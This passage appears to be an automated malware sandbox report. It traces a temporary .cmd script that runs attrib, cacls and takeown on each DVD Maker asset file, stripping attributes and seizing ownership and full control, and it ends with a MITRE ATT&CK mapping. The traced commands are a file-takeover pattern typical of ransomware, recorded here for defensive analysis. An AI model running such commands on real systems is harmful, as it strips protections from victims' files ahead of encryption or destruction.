- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv"
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv"
    3⤵
    PID:676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground_PAL.wmv""
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground_PAL.wmv"
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground_PAL.wmv" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground_PAL.wmv"
    3⤵
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground.wmv""
  2⤵
  PID:1444
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground.wmv"
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground.wmv" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground.wmv"
    3⤵
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv""
  2⤵
  PID:1956
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv"
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv" /E /G Admin:F /C
    3⤵
    PID:600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv"
    3⤵
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv""
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv"
    3⤵
    - Views/modifies file attributes
    PID:1668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv"
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv""
  2⤵
  PID:2008
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv"
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv"
    3⤵
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground.wmv""
  2⤵
  PID:2040
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground.wmv"
    3⤵
    PID:816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground.wmv" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground.wmv"
    3⤵
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv""
  2⤵
  PID:1788
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv"
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv"
    3⤵
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground.wmv""
  2⤵
  PID:2036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground.wmv"
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground.wmv" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground.wmv"
    3⤵
    PID:676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground_PAL.wmv""
  2⤵
  PID:888
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground_PAL.wmv"
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground_PAL.wmv" /E /G Admin:F /C
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground_PAL.wmv"
    3⤵
    PID:904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG""
  2⤵
  PID:1100
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG"
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG"
    3⤵
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png""
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png"
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png" /E /G Admin:F /C
    3⤵
    PID:600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png"
    3⤵
    PID:1192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png""
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png" /E /G Admin:F /C
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png"
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png""
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png"
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png" /E /G Admin:F /C
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png"
    3⤵
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png""
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png"
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png" /E /G Admin:F /C
    3⤵
    PID:744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png"
    3⤵
    PID:1920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png""
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png"
    3⤵
    - Drops file in Program Files directory
    PID:748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png" /E /G Admin:F /C
    3⤵
    PID:268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png"
    3⤵
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\28ZgLU0Y.cmd" "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-background.png""
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-background.png"
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-background.png" /E /G Admin:F /C
    3⤵
    PID:332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-background.png"
    3⤵
    PID:676

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/316-0-0x000000000253C000-0x000000000253D000-memory.dmp

Filesize
4KB

Download
memory/1404-5-0x00000000002AC000-0x00000000002AD000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads